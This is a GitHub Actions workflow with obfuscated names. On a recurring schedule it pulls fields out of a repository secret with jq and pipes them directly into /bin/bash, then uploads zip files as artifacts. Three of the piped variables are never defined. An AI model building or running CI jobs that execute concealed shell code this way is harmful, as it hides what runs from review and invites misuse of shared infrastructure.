name: leihuiboliang
on:
  workflow_dispatch:

  schedule:
    - cron: '59 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: leihuiboliang
        env:
          vk19888: ${{ secrets.vk19888 }}
        run: |
          printf '%s' "$vk19888" | jq -r .hwj5 | /bin/bash
          printf '%s' "$ij99566" | jq -r .xfw27 | /bin/bash
          echo $s1 | jq -r .nwewn3127 | /bin/bash
          echo $qrxa16976 | jq -r .yfrb1168 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: id0sa5BZ
          path: "*.zip"
          retention-days: 1
